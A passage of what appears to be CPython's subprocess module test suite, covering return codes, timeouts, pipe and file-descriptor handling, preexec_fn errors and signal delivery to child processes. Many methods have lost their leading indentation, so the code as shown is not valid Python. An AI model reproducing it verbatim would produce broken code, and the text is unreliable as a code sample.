        self.assertEqual(proc.returncode, expected_errorcode,
                         msg="unexpected result in second main wait.")
        t.join()
        # Ensure that all of the thread results are as expected.
        # When a race condition occurs in wait(), the returncode could
        # be set by the wrong thread that doesn't actually have it
        # leading to an incorrect value.
        self.assertEqual([('thread-start-poll-result', None),
                          ('thread-after-kill-and-wait', expected_errorcode),
                          ('thread-after-second-wait', expected_errorcode)],
                         results)
def test_issue8780(self):
# Ensure that stdout is inherited from the parent
# if stdout=PIPE is not used
code = ';'.join((
'import subprocess, sys',
'retcode = subprocess.call('
"[sys.executable, '-c', 'print(\"Hello World!\")'])",
'assert retcode == 0'))
output = subprocess.check_output([sys.executable, '-c', code])
self.assertTrue(output.startswith(b'Hello World!'), ascii(output))
    def test_handles_closed_on_exception(self):
        # If CreateProcess exits with an error, ensure the
        # duplicate output handles are released
        # "*" is not a valid program name, so Popen is expected to raise.
        ifhandle, ifname = tempfile.mkstemp()
        ofhandle, ofname = tempfile.mkstemp()
        efhandle, efname = tempfile.mkstemp()
        try:
           subprocess.Popen (["*"], stdin=ifhandle, stdout=ofhandle,
                             stderr=efhandle)
        except OSError:
            # NOTE(review): cleanup runs only on the expected failure path;
            # if Popen unexpectedly succeeded, the temp files would leak and
            # the os.remove would fail on Windows while handles stay open.
            os.close(ifhandle)
            os.remove(ifname)
            os.close(ofhandle)
            os.remove(ofname)
            os.close(efhandle)
            os.remove(efname)
        # Removal succeeding proves no duplicated handle still held the files.
        self.assertFalse(os.path.exists(ifname))
        self.assertFalse(os.path.exists(ofname))
        self.assertFalse(os.path.exists(efname))
def test_communicate_epipe(self):
# Issue 10963: communicate() should hide EPIPE
p = subprocess.Popen([sys.executable, "-c", 'pass'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
p.communicate(b"x" * 2**20)
def test_communicate_epipe_only_stdin(self):
# Issue 10963: communicate() should hide EPIPE
p = subprocess.Popen([sys.executable, "-c", 'pass'],
stdin=subprocess.PIPE)
self.addCleanup(p.stdin.close)
p.wait()
p.communicate(b"x" * 2**20)
    @unittest.skipUnless(hasattr(signal, 'SIGUSR1'),
                         "Requires signal.SIGUSR1")
    @unittest.skipUnless(hasattr(os, 'kill'),
                         "Requires os.kill")
    @unittest.skipUnless(hasattr(os, 'getppid'),
                         "Requires os.getppid")
    def test_communicate_eintr(self):
        # Issue #12493: communicate() should handle EINTR
        def handler(signum, frame):
            pass
        old_handler = signal.signal(signal.SIGUSR1, handler)
        self.addCleanup(signal.signal, signal.SIGUSR1, old_handler)
        # The child signals us (its parent) while we are blocked inside
        # communicate(); the interrupted syscall must be retried.
        args = [sys.executable, "-c",
                'import os, signal;'
                'os.kill(os.getppid(), signal.SIGUSR1)']
        for stream in ('stdout', 'stderr'):
            kw = {stream: subprocess.PIPE}
            with subprocess.Popen(args, **kw) as process:
                # communicate() will be interrupted by SIGUSR1
                process.communicate()
    # This test is Linux-ish specific for simplicity to at least have
    # some coverage.  It is not a platform specific bug.
    @unittest.skipUnless(os.path.isdir('/proc/%d/fd' % os.getpid()),
                         "Linux specific")
    def test_failed_child_execute_fd_leak(self):
        """Test for the fork() failure fd leak reported in issue16327."""
        fd_directory = '/proc/%d/fd' % os.getpid()
        fds_before_popen = os.listdir(fd_directory)
        # PopenExecuteChildRaises presumably overrides _execute_child to
        # raise PopenTestException after the pipes are created -- defined
        # elsewhere in this module.
        with self.assertRaises(PopenTestException):
            PopenExecuteChildRaises(
                    [sys.executable, '-c', 'pass'], stdin=subprocess.PIPE,
                    stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        # NOTE: This test doesn't verify that the real _execute_child
        # does not close the file descriptors itself on the way out
        # during an exception.  Code inspection has confirmed that.
        fds_after_exception = os.listdir(fd_directory)
        self.assertEqual(fds_before_popen, fds_after_exception)
class RunFuncTestCase(BaseTestCase):
def run_python(self, code, **kwargs):
"""Run Python code in a subprocess using subprocess.run"""
argv = [sys.executable, "-c", code]
return subprocess.run(argv, **kwargs)
def test_returncode(self):
# call() function with sequence argument
cp = self.run_python("import sys; sys.exit(47)")
self.assertEqual(cp.returncode, 47)
with self.assertRaises(subprocess.CalledProcessError):
cp.check_returncode()
def test_check(self):
with self.assertRaises(subprocess.CalledProcessError) as c:
self.run_python("import sys; sys.exit(47)", check=True)
self.assertEqual(c.exception.returncode, 47)
def test_check_zero(self):
# check_returncode shouldn't raise when returncode is zero
cp = self.run_python("import sys; sys.exit(0)", check=True)
self.assertEqual(cp.returncode, 0)
def test_timeout(self):
# run() function with timeout argument; we want to test that the child
# process gets killed when the timeout expires. If the child isn't
# killed, this call will deadlock since subprocess.run waits for the
# child.
with self.assertRaises(subprocess.TimeoutExpired):
self.run_python("while True: pass", timeout=0.0001)
def test_capture_stdout(self):
# capture stdout with zero return code
cp = self.run_python("print('BDFL')", stdout=subprocess.PIPE)
self.assertIn(b'BDFL', cp.stdout)
def test_capture_stderr(self):
cp = self.run_python("import sys; sys.stderr.write('BDFL')",
stderr=subprocess.PIPE)
self.assertIn(b'BDFL', cp.stderr)
def test_check_output_stdin_arg(self):
# run() can be called with stdin set to a file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
cp = self.run_python(
"import sys; sys.stdout.write(sys.stdin.read().upper())",
stdin=tf, stdout=subprocess.PIPE)
self.assertIn(b'PEAR', cp.stdout)
def test_check_output_input_arg(self):
# check_output() can be called with input set to a string
cp = self.run_python(
"import sys; sys.stdout.write(sys.stdin.read().upper())",
input=b'pear', stdout=subprocess.PIPE)
self.assertIn(b'PEAR', cp.stdout)
def test_check_output_stdin_with_input_arg(self):
# run() refuses to accept 'stdin' with 'input'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
with self.assertRaises(ValueError,
msg="Expected ValueError when stdin and input args supplied.") as c:
output = self.run_python("print('will not be run')",
stdin=tf, input=b'hare')
self.assertIn('stdin', c.exception.args[0])
self.assertIn('input', c.exception.args[0])
def test_check_output_timeout(self):
with self.assertRaises(subprocess.TimeoutExpired) as c:
cp = self.run_python((
"import sys, time\n"
"sys.stdout.write('BDFL')\n"
"sys.stdout.flush()\n"
"time.sleep(3600)"),
# Some heavily loaded buildbots (sparc Debian 3.x) require
# this much time to start and print.
timeout=3, stdout=subprocess.PIPE)
self.assertEqual(c.exception.output, b'BDFL')
# output is aliased to stdout
self.assertEqual(c.exception.stdout, b'BDFL')
    def test_run_kwargs(self):
        # Extra keyword args (here: env) must be forwarded to Popen.
        newenv = os.environ.copy()
        newenv["FRUIT"] = "banana"
        # Child exits 33 only if it saw the injected environment variable.
        cp = self.run_python(('import sys, os;'
                              'sys.exit(33 if os.getenv("FRUIT")=="banana" else 31)'),
                             env=newenv)
        self.assertEqual(cp.returncode, 33)
@unittest.skipIf(mswindows, "POSIX specific tests")
class POSIXProcessTestCase(BaseTestCase):
    def setUp(self):
        super().setUp()
        # Path used by several tests to provoke ENOENT-style failures.
        self._nonexistent_dir = "/_this/pa.th/does/not/exist"
    def _get_chdir_exception(self):
        """Return the OSError produced by chdir()ing to self._nonexistent_dir.

        Used as the 'expected' exception for tests that make the child fail
        on a bad cwd/executable/argv[0].
        """
        try:
            os.chdir(self._nonexistent_dir)
        except OSError as e:
            # This avoids hard coding the errno value or the OS perror()
            # string and instead capture the exception that we want to see
            # below for comparison.
            desired_exception = e
            desired_exception.strerror += ': ' + repr(self._nonexistent_dir)
        else:
            self.fail("chdir to nonexistent directory %s succeeded." %
                      self._nonexistent_dir)
        return desired_exception
    def test_exception_cwd(self):
        """Test error in the child raised in the parent for a bad cwd."""
        desired_exception = self._get_chdir_exception()
        try:
            # cwd points at a directory that cannot exist, so fork/exec fails.
            p = subprocess.Popen([sys.executable, "-c", ""],
                                 cwd=self._nonexistent_dir)
        except OSError as e:
            # Test that the child process chdir failure actually makes
            # it up to the parent process as the correct exception.
            self.assertEqual(desired_exception.errno, e.errno)
            self.assertEqual(desired_exception.strerror, e.strerror)
        else:
            self.fail("Expected OSError: %s" % desired_exception)
    def test_exception_bad_executable(self):
        """Test error in the child raised in the parent for a bad executable."""
        desired_exception = self._get_chdir_exception()
        try:
            # executable= overrides argv[0]; pointing it nowhere makes exec fail.
            p = subprocess.Popen([sys.executable, "-c", ""],
                                 executable=self._nonexistent_dir)
        except OSError as e:
            # Test that the child process exec failure actually makes
            # it up to the parent process as the correct exception.
            self.assertEqual(desired_exception.errno, e.errno)
            self.assertEqual(desired_exception.strerror, e.strerror)
        else:
            self.fail("Expected OSError: %s" % desired_exception)
    def test_exception_bad_args_0(self):
        """Test error in the child raised in the parent for a bad args[0]."""
        desired_exception = self._get_chdir_exception()
        try:
            # argv[0] itself is the nonexistent path, so exec fails.
            p = subprocess.Popen([self._nonexistent_dir, "-c", ""])
        except OSError as e:
            # Test that the child process exec failure actually makes
            # it up to the parent process as the correct exception.
            self.assertEqual(desired_exception.errno, e.errno)
            self.assertEqual(desired_exception.strerror, e.strerror)
        else:
            self.fail("Expected OSError: %s" % desired_exception)
    def test_restore_signals(self):
        # Code coverage for both values of restore_signals to make sure it
        # at least does not blow up.
        # A test for behavior would be complex.  Contributions welcome.
        subprocess.call([sys.executable, "-c", ""], restore_signals=True)
        subprocess.call([sys.executable, "-c", ""], restore_signals=False)
    def test_start_new_session(self):
        # For code coverage of calling setsid().  We don't care if we get an
        # EPERM error from it depending on the test execution environment, that
        # still indicates that it was called.
        try:
            # The child reports its own process group id on stdout.
            output = subprocess.check_output(
                    [sys.executable, "-c",
                     "import os; print(os.getpgid(os.getpid()))"],
                    start_new_session=True)
        except OSError as e:
            if e.errno != errno.EPERM:
                raise
        else:
            # setsid() in the child must have put it in a new process group.
            parent_pgid = os.getpgid(os.getpid())
            child_pgid = int(output)
            self.assertNotEqual(parent_pgid, child_pgid)
    def test_run_abort(self):
        # returncode handles signal termination
        # Suppress core dumps / crash dialogs while the child abort()s.
        with support.SuppressCrashReport():
            p = subprocess.Popen([sys.executable, "-c",
                                  'import os; os.abort()'])
            p.wait()
        # A signal-terminated child is reported as the negated signal number.
        self.assertEqual(-p.returncode, signal.SIGABRT)
    def test_CalledProcessError_str_signal(self):
        # str() of a signal-death CalledProcessError should name the signal.
        err = subprocess.CalledProcessError(-int(signal.SIGABRT), "fake cmd")
        error_string = str(err)
        # We're relying on the repr() of the signal.Signals intenum to provide
        # the word signal, the signal name and the numeric value.
        self.assertIn("signal", error_string.lower())
        # We're not being specific about the signal name as some signals have
        # multiple names and which name is revealed can vary.
        self.assertIn("SIG", error_string)
        self.assertIn(str(signal.SIGABRT), error_string)
def test_CalledProcessError_str_unknown_signal(self):
err = subprocess.CalledProcessError(-9876543, "fake cmd")
error_string = str(err)
self.assertIn("unknown signal 9876543.", error_string)
def test_CalledProcessError_str_non_zero(self):
err = subprocess.CalledProcessError(2, "fake cmd")
error_string = str(err)
self.assertIn("non-zero exit status 2.", error_string)
    def test_preexec(self):
        # DISCLAIMER: Setting environment variables is *not* a good use
        # of a preexec_fn. This is merely a test.
        # The preexec_fn runs in the child after fork() and before exec(),
        # so the env var it sets is visible to the exec'd interpreter.
        p = subprocess.Popen([sys.executable, "-c",
                              'import sys,os;'
                              'sys.stdout.write(os.getenv("FRUIT"))'],
                             stdout=subprocess.PIPE,
                             preexec_fn=lambda: os.putenv("FRUIT", "apple"))
        with p:
            self.assertEqual(p.stdout.read(), b"apple")
    def test_preexec_exception(self):
        # An exception raised by preexec_fn in the child must be propagated
        # to the parent.  Which exception type arrives depends on whether the
        # C accelerator (_posixsubprocess) or the pure Python path is in use.
        def raise_it():
            raise ValueError("What if two swallows carried a coconut?")
        try:
            p = subprocess.Popen([sys.executable, "-c", ""],
                                 preexec_fn=raise_it)
        except subprocess.SubprocessError as e:
            # C path: generic SubprocessError; only expected when the
            # accelerator module is actually present.
            self.assertTrue(
                    subprocess._posixsubprocess,
                    "Expected a ValueError from the preexec_fn")
        except ValueError as e:
            # Pure Python path: the original exception (and message) survive.
            self.assertIn("coconut", e.args[0])
        else:
            self.fail("Exception raised by preexec_fn did not make it "
                      "to the parent process.")
    class _TestExecuteChildPopen(subprocess.Popen):
        """Used to test behavior at the end of _execute_child."""
        def __init__(self, testcase, *args, **kwargs):
            # Keep a reference to the TestCase so _execute_child can assert.
            self._testcase = testcase
            subprocess.Popen.__init__(self, *args, **kwargs)

        def _execute_child(self, *args, **kwargs):
            try:
                subprocess.Popen._execute_child(self, *args, **kwargs)
            finally:
                # Open a bunch of file descriptors and verify that
                # none of them are the same as the ones the Popen
                # instance is using for stdin/stdout/stderr.
                # If any pipe fd had been closed early, one of these fresh
                # fds would reuse its number and collide below.
                devzero_fds = [os.open("/dev/zero", os.O_RDONLY)
                               for _ in range(8)]
                try:
                    for fd in devzero_fds:
                        self._testcase.assertNotIn(
                                fd, (self.stdin.fileno(), self.stdout.fileno(),
                                     self.stderr.fileno()),
                                msg="At least one fd was closed early.")
                finally:
                    for fd in devzero_fds:
                        os.close(fd)
    @unittest.skipIf(not os.path.exists("/dev/zero"), "/dev/zero required.")
    def test_preexec_errpipe_does_not_double_close_pipes(self):
        """Issue16140: Don't double close pipes on preexec error."""
        def raise_it():
            # Forces _execute_child() down its errpipe_data error path.
            raise subprocess.SubprocessError(
                    "force the _execute_child() errpipe_data path.")
        with self.assertRaises(subprocess.SubprocessError):
            self._TestExecuteChildPopen(
                        self, [sys.executable, "-c", "pass"],
                        stdin=subprocess.PIPE, stdout=subprocess.PIPE,
                        stderr=subprocess.PIPE, preexec_fn=raise_it)
    def test_preexec_gc_module_failure(self):
        # This tests the code that disables garbage collection if the child
        # process will execute any Python.
        def raise_runtime_error():
            raise RuntimeError("this shouldn't escape")
        enabled = gc.isenabled()
        # Save the real gc functions so the monkeypatching below can be
        # reliably undone in the finally block.
        orig_gc_disable = gc.disable
        orig_gc_isenabled = gc.isenabled
        try:
            gc.disable()
            self.assertFalse(gc.isenabled())
            subprocess.call([sys.executable, '-c', ''],
                            preexec_fn=lambda: None)
            # Popen must not have re-enabled gc behind our back.
            self.assertFalse(gc.isenabled(),
                             "Popen enabled gc when it shouldn't.")

            gc.enable()
            self.assertTrue(gc.isenabled())
            subprocess.call([sys.executable, '-c', ''],
                            preexec_fn=lambda: None)
            # ...and must restore gc to enabled when it started enabled.
            self.assertTrue(gc.isenabled(), "Popen left gc disabled.")

            # Errors raised by the gc module itself must escape from Popen.
            gc.disable = raise_runtime_error
            self.assertRaises(RuntimeError, subprocess.Popen,
                              [sys.executable, '-c', ''],
                              preexec_fn=lambda: None)

            del gc.isenabled  # force an AttributeError
            self.assertRaises(AttributeError, subprocess.Popen,
                              [sys.executable, '-c', ''],
                              preexec_fn=lambda: None)
        finally:
            gc.disable = orig_gc_disable
            gc.isenabled = orig_gc_isenabled
            if not enabled:
                gc.disable()
    @unittest.skipIf(
        sys.platform == 'darwin', 'setrlimit() seems to fail on OS X')
    def test_preexec_fork_failure(self):
        # The internal code did not preserve the previous exception when
        # re-enabling garbage collection
        try:
            from resource import getrlimit, setrlimit, RLIMIT_NPROC
        except ImportError as err:
            self.skipTest(err)  # RLIMIT_NPROC is specific to Linux and BSD
        limits = getrlimit(RLIMIT_NPROC)
        [_, hard] = limits
        # Soft limit 0 means fork() itself should fail with EAGAIN.
        setrlimit(RLIMIT_NPROC, (0, hard))
        self.addCleanup(setrlimit, RLIMIT_NPROC, limits)
        try:
            subprocess.call([sys.executable, '-c', ''],
                            preexec_fn=lambda: None)
        except BlockingIOError:
            # Forking should raise EAGAIN, translated to BlockingIOError
            pass
        else:
            self.skipTest('RLIMIT_NPROC had no effect; probably superuser')
    def test_args_string(self):
        # args is a string
        # Build a tiny executable shell script that exits 47, then make sure
        # Popen accepts a single path string (not a list) as args.
        fd, fname = tempfile.mkstemp()
        # reopen in text mode
        with open(fd, "w", errors="surrogateescape") as fobj:
            fobj.write("#!%s\n" % support.unix_shell)
            fobj.write("exec '%s' -c 'import sys; sys.exit(47)'\n" %
                       sys.executable)
        os.chmod(fname, 0o700)
        p = subprocess.Popen(fname)
        p.wait()
        os.remove(fname)
        self.assertEqual(p.returncode, 47)
def test_invalid_args(self):
# invalid arguments should raise ValueError
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
startupinfo=47)
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
creationflags=47)
def test_shell_sequence(self):
# Run command through the shell (sequence)
newenv = os.environ.copy()
newenv["FRUIT"] = "apple"
p = subprocess.Popen(["echo $FRUIT"], shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertEqual(p.stdout.read().strip(b" \t\r\n\f"), b"apple")
def test_shell_string(self):
# Run command through the shell (string)
newenv = os.environ.copy()
newenv["FRUIT"] = "apple"
p = subprocess.Popen("echo $FRUIT", shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertEqual(p.stdout.read().strip(b" \t\r\n\f"), b"apple")
    def test_call_string(self):
        # call() function with string argument on UNIX
        # Same script trick as test_args_string, but through call().
        fd, fname = tempfile.mkstemp()
        # reopen in text mode
        with open(fd, "w", errors="surrogateescape") as fobj:
            fobj.write("#!%s\n" % support.unix_shell)
            fobj.write("exec '%s' -c 'import sys; sys.exit(47)'\n" %
                       sys.executable)
        os.chmod(fname, 0o700)
        rc = subprocess.call(fname)
        os.remove(fname)
        self.assertEqual(rc, 47)
def test_specific_shell(self):
# Issue #9265: Incorrect name passed as arg[0].
shells = []
for prefix in ['/bin', '/usr/bin/', '/usr/local/bin']:
for name in ['bash', 'ksh']:
sh = os.path.join(prefix, name)
if os.path.isfile(sh):
shells.append(sh)
if not shells: # Will probably work for any shell but csh.
self.skipTest("bash or ksh required for this test")
sh = '/bin/sh'
if os.path.isfile(sh) and not os.path.islink(sh):
# Test will fail if /bin/sh is a symlink to csh.
shells.append(sh)
for sh in shells:
p = subprocess.Popen("echo $0", executable=sh, shell=True,
stdout=subprocess.PIPE)
with p:
self.assertEqual(p.stdout.read().strip(), bytes(sh, 'ascii'))
    def _kill_process(self, method, *args):
        # Spawn a long-sleeping child and invoke p.<method>(*args) on it
        # once it is known to be fully started; returns the Popen object.
        # Do not inherit file handles from the parent.
        # It should fix failures on some platforms.
        # Also set the SIGINT handler to the default to make sure it's not
        # being ignored (some tests rely on that.)
        old_handler = signal.signal(signal.SIGINT, signal.default_int_handler)
        try:
            p = subprocess.Popen([sys.executable, "-c", """if 1:
                                 import sys, time
                                 sys.stdout.write('x\\n')
                                 sys.stdout.flush()
                                 time.sleep(30)
                                 """],
                                 close_fds=True,
                                 stdin=subprocess.PIPE,
                                 stdout=subprocess.PIPE,
                                 stderr=subprocess.PIPE)
        finally:
            signal.signal(signal.SIGINT, old_handler)
        # Wait for the interpreter to be completely initialized before
        # sending any signal.
        p.stdout.read(1)
        getattr(p, method)(*args)
        return p
    @unittest.skipIf(sys.platform.startswith(('netbsd', 'openbsd')),
                     "Due to known OS bug (issue #16762)")
    def _kill_dead_process(self, method, *args):
        # Like _kill_process(), but waits for the child to exit first so
        # the kill/terminate/send_signal call targets an already-dead pid.
        # NOTE(review): the skipIf decorator on this *helper* appears to work
        # by raising SkipTest when a test calls it — confirm that is intended.
        # Do not inherit file handles from the parent.
        # It should fix failures on some platforms.
        p = subprocess.Popen([sys.executable, "-c", """if 1:
                             import sys, time
                             sys.stdout.write('x\\n')
                             sys.stdout.flush()
                             """],
                             close_fds=True,
                             stdin=subprocess.PIPE,
                             stdout=subprocess.PIPE,
                             stderr=subprocess.PIPE)
        # Wait for the interpreter to be completely initialized before
        # sending any signal.
        p.stdout.read(1)
        # The process should end after this
        time.sleep(1)
        # This shouldn't raise even though the child is now dead
        getattr(p, method)(*args)
        p.communicate()
    def test_send_signal(self):
        # SIGINT should interrupt the child with a KeyboardInterrupt traceback.
        p = self._kill_process('send_signal', signal.SIGINT)
        _, stderr = p.communicate()
        self.assertIn(b'KeyboardInterrupt', stderr)
        self.assertNotEqual(p.wait(), 0)
    def test_kill(self):
        # kill() delivers SIGKILL; the child dies silently with -SIGKILL.
        p = self._kill_process('kill')
        _, stderr = p.communicate()
        self.assertStderrEqual(stderr, b'')
        self.assertEqual(p.wait(), -signal.SIGKILL)
    def test_terminate(self):
        # terminate() delivers SIGTERM; the child dies silently with -SIGTERM.
        p = self._kill_process('terminate')
        _, stderr = p.communicate()
        self.assertStderrEqual(stderr, b'')
        self.assertEqual(p.wait(), -signal.SIGTERM)
    def test_send_signal_dead(self):
        # Sending a signal to a dead process
        # Must not raise even though the pid has already exited.
        self._kill_dead_process('send_signal', signal.SIGINT)
    def test_kill_dead(self):
        # Killing a dead process
        # Must not raise even though the pid has already exited.
        self._kill_dead_process('kill')
    def test_terminate_dead(self):
        # Terminating a dead process
        # Must not raise even though the pid has already exited.
        self._kill_dead_process('terminate')
def _save_fds(self, save_fds):
fds = []
for fd in save_fds:
inheritable = os.get_inheritable(fd)
saved = os.dup(fd)
fds.append((fd, saved, inheritable))
return fds
def _restore_fds(self, fds):
for fd, saved, inheritable in fds:
os.dup2(saved, fd, inheritable=inheritable)
os.close(saved)
    def check_close_std_fds(self, fds):
        # Issue #9905: test that subprocess pipes still work properly with
        # some standard fds closed
        stdin = 0
        saved_fds = self._save_fds(fds)
        # If fd 0 is among the fds being closed, hand its saved duplicate
        # to the child as stdin so the child still has a valid stdin.
        for fd, saved, inheritable in saved_fds:
            if fd == 0:
                stdin = saved
                break
        try:
            for fd in fds:
                os.close(fd)
            out, err = subprocess.Popen([sys.executable, "-c",
                              'import sys;'
                              'sys.stdout.write("apple");'
                              'sys.stdout.flush();'
                              'sys.stderr.write("orange")'],
                       stdin=stdin,
                       stdout=subprocess.PIPE,
                       stderr=subprocess.PIPE).communicate()
            # Ignore interpreter noise (e.g. debug build output) on stderr.
            err = support.strip_python_stderr(err)
            self.assertEqual((out, err), (b'apple', b'orange'))
        finally:
            self._restore_fds(saved_fds)
    def test_close_fd_0(self):
        # Pipes must keep working with stdin (fd 0) closed beforehand.
        self.check_close_std_fds([0])
    def test_close_fd_1(self):
        # Pipes must keep working with stdout (fd 1) closed beforehand.
        self.check_close_std_fds([1])
    def test_close_fd_2(self):
        # Pipes must keep working with stderr (fd 2) closed beforehand.
        self.check_close_std_fds([2])
    def test_close_fds_0_1(self):
        # Pipes must keep working with fds 0 and 1 closed beforehand.
        self.check_close_std_fds([0, 1])
    def test_close_fds_0_2(self):
        # Pipes must keep working with fds 0 and 2 closed beforehand.
        self.check_close_std_fds([0, 2])
    def test_close_fds_1_2(self):
        # Pipes must keep working with fds 1 and 2 closed beforehand.
        self.check_close_std_fds([1, 2])
    def test_close_fds_0_1_2(self):
        # Issue #10806: test that subprocess pipes still work properly with
        # all standard fds closed.
        self.check_close_std_fds([0, 1, 2])
    def test_small_errpipe_write_fd(self):
        """Issue #15798: Popen should work when stdio fds are available."""
        new_stdin = os.dup(0)
        new_stdout = os.dup(1)
        try:
            # Free fds 0 and 1 so the internal errpipe lands on a low fd.
            os.close(0)
            os.close(1)

            # Side test: if errpipe_write fails to have its CLOEXEC
            # flag set this should cause the parent to think the exec
            # failed.  Extremely unlikely: everyone supports CLOEXEC.
            subprocess.Popen([
                    sys.executable, "-c",
                    "print('AssertionError:0:CLOEXEC failure.')"]).wait()
        finally:
            # Restore original stdin and stdout
            os.dup2(new_stdin, 0)
            os.dup2(new_stdout, 1)
            os.close(new_stdin)
            os.close(new_stdout)
    def test_remapping_std_fds(self):
        # Verify the child can take its stdio from arbitrary fds, even when
        # those fds currently occupy the standard 0/1/2 slots "wrongly".
        # open up some temporary files
        temps = [tempfile.mkstemp() for i in range(3)]
        try:
            temp_fds = [fd for fd, fname in temps]

            # unlink the files -- we won't need to reopen them
            for fd, fname in temps:
                os.unlink(fname)

            # write some data to what will become stdin, and rewind
            os.write(temp_fds[1], b"STDIN")
            os.lseek(temp_fds[1], 0, 0)

            # move the standard file descriptors out of the way
            saved_fds = self._save_fds(range(3))
            try:
                # duplicate the file objects over the standard fd's
                for fd, temp_fd in enumerate(temp_fds):
                    os.dup2(temp_fd, fd)

                # now use those files in the "wrong" order, so that subprocess
                # has to rearrange them in the child
                p = subprocess.Popen([sys.executable, "-c",
                    'import sys; got = sys.stdin.read();'
                    'sys.stdout.write("got %s"%got); sys.stderr.write("err")'],
                    stdin=temp_fds[1],
                    stdout=temp_fds[2],
                    stderr=temp_fds[0])
                p.wait()
            finally:
                self._restore_fds(saved_fds)

            for fd in temp_fds:
                os.lseek(fd, 0, 0)

            out = os.read(temp_fds[2], 1024)
            err = support.strip_python_stderr(os.read(temp_fds[0], 1024))
            self.assertEqual(out, b"got STDIN")
            self.assertEqual(err, b"err")

        finally:
            for fd in temp_fds:
                os.close(fd)
    def check_swap_fds(self, stdin_no, stdout_no, stderr_no):
        # Helper for test_swap_fds: map three unlinked temp files onto fds
        # 0/1/2, then ask the child to use them in the given (permuted) order.
        # open up some temporary files
        temps = [tempfile.mkstemp() for i in range(3)]
        temp_fds = [fd for fd, fname in temps]
        try:
            # unlink the files -- we won't need to reopen them
            for fd, fname in temps:
                os.unlink(fname)

            # save a copy of the standard file descriptors
            saved_fds = self._save_fds(range(3))
            try:
                # duplicate the temp files over the standard fd's 0, 1, 2
                for fd, temp_fd in enumerate(temp_fds):
                    os.dup2(temp_fd, fd)

                # write some data to what will become stdin, and rewind
                os.write(stdin_no, b"STDIN")
                os.lseek(stdin_no, 0, 0)

                # now use those files in the given order, so that subprocess
                # has to rearrange them in the child
                p = subprocess.Popen([sys.executable, "-c",
                    'import sys; got = sys.stdin.read();'
                    'sys.stdout.write("got %s"%got); sys.stderr.write("err")'],
                    stdin=stdin_no,
                    stdout=stdout_no,
                    stderr=stderr_no)
                p.wait()

                for fd in temp_fds:
                    os.lseek(fd, 0, 0)

                out = os.read(stdout_no, 1024)
                err = support.strip_python_stderr(os.read(stderr_no, 1024))
            finally:
                self._restore_fds(saved_fds)

            self.assertEqual(out, b"got STDIN")
            self.assertEqual(err, b"err")

        finally:
            for fd in temp_fds:
                os.close(fd)
# When duping fds, if there arises a situation where one of the fds is
# either 0, 1 or 2, it is possible that it is overwritten (#12607).
# This tests all combinations of this.
def test_swap_fds(self):
self.check_swap_fds(0, 1, 2)
self.check_swap_fds(0, 2, 1)
self.check_swap_fds(1, 0, 2)
self.check_swap_fds(1, 2, 0)
self.check_swap_fds(2, 0, 1)
self.check_swap_fds(2, 1, 0)
    def test_surrogates_error_message(self):
        # A preexec_fn error message containing surrogates must survive the
        # trip from child to parent (pure Python path) or be replaced by the
        # C accelerator's generic message.
        def prepare():
            raise ValueError("surrogate:\uDCff")

        try:
            subprocess.call(
                [sys.executable, "-c", "pass"],
                preexec_fn=prepare)
        except ValueError as err:
            # Pure Python implementations keeps the message
            self.assertIsNone(subprocess._posixsubprocess)
            self.assertEqual(str(err), "surrogate:\uDCff")
        except subprocess.SubprocessError as err:
            # _posixsubprocess uses a default message
            self.assertIsNotNone(subprocess._posixsubprocess)
            self.assertEqual(str(err), "Exception occurred in preexec_fn.")
        else:
            self.fail("Expected ValueError or subprocess.SubprocessError")
    def test_undecodable_env(self):
        # Environment names/values containing surrogates must round-trip to
        # the child, both as str (surrogateescape) and as raw bytes.
        for key, value in (('test', 'abc\uDCFF'), ('test\uDCFF', '42')):
            encoded_value = value.encode("ascii", "surrogateescape")

            # test str with surrogates
            script = "import os; print(ascii(os.getenv(%s)))" % repr(key)
            env = os.environ.copy()
            env[key] = value
            # Use C locale to get ASCII for the locale encoding to force
            # surrogate-escaping of \xFF in the child process; otherwise it can
            # be decoded as-is if the default locale is latin-1.
            env['LC_ALL'] = 'C'
            if sys.platform.startswith("aix"):
                # On AIX, the C locale uses the Latin1 encoding
                decoded_value = encoded_value.decode("latin1", "surrogateescape")
            else:
                # On other UNIXes, the C locale uses the ASCII encoding
                decoded_value = value
            stdout = subprocess.check_output(
                [sys.executable, "-c", script],
                env=env)
            stdout = stdout.rstrip(b'\n\r')
            self.assertEqual(stdout.decode('ascii'), ascii(decoded_value))

            # test bytes
            key = key.encode("ascii", "surrogateescape")
            script = "import os; print(ascii(os.getenvb(%s)))" % repr(key)
            env = os.environ.copy()
            env[key] = encoded_value
            stdout = subprocess.check_output(
                [sys.executable, "-c", script],
                env=env)
            stdout = stdout.rstrip(b'\n\r')
            self.assertEqual(stdout.decode('ascii'), ascii(encoded_value))
    def test_bytes_program(self):
        # A program may be given as bytes: absolute path, shell string,
        # and PATH lookup with both str and bytes environments.
        abs_program = os.fsencode(sys.executable)
        path, program = os.path.split(sys.executable)
        program = os.fsencode(program)

        # absolute bytes path
        exitcode = subprocess.call([abs_program, "-c", "pass"])
        self.assertEqual(exitcode, 0)

        # absolute bytes path as a string
        cmd = b"'" + abs_program + b"' -c pass"
        exitcode = subprocess.call(cmd, shell=True)
        self.assertEqual(exitcode, 0)

        # bytes program, unicode PATH
        env = os.environ.copy()
        env["PATH"] = path
        exitcode = subprocess.call([program, "-c", "pass"], env=env)
        self.assertEqual(exitcode, 0)

        # bytes program, bytes PATH
        envb = os.environb.copy()
        envb[b"PATH"] = os.fsencode(path)
        exitcode = subprocess.call([program, "-c", "pass"], env=envb)
        self.assertEqual(exitcode, 0)
    def test_pipe_cloexec(self):
        # Even with close_fds=False, the pipe fds Popen creates for one child
        # must not leak into a second child (they are CLOEXEC).
        sleeper = support.findfile("input_reader.py", subdir="subprocessdata")
        fd_status = support.findfile("fd_status.py", subdir="subprocessdata")

        p1 = subprocess.Popen([sys.executable, sleeper],
